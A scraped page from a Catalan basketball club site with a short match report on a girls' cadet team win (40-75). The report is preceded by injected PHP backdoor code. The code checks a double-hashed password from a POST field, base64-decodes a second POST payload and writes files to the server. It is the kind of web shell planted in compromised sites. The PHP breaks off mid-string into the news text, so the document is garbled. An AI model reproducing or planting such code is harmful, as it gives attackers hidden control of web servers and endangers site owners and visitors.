function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet Femení 07A treballa molt bé en atac i derrota al Vilabàsquet Viladecans (40-75) - Tgn Bàsquet Club -

El Cadet Femení 07A treballa molt bé en atac i derrota al Vilabàsquet Viladecans (40-75)

Updated: desembre 9, 2021

El Cadet Femení 07A va fer un molt bon partit ofensivament i gràcies a la constància de la segona part va guanyar a la pista del Vilabàsquet Viladecans. Les liles van tenir un bon inici tot i que defensivament van permetre massa les locals que van anotar amb facilitat. El segon període les rivals van aguantar el ritme del TGN fins que quan falten tres minuts pel descans les noies entrenades per Oriol van fer un parcial de 0-11 que va donar aire a l’equip. La segona part va servir per eixamplar les distàncies amb el rival i gràcies a la constància i a l’esforç de les jugadores liles el matx ja va quedar sentenciat a l’últim quart.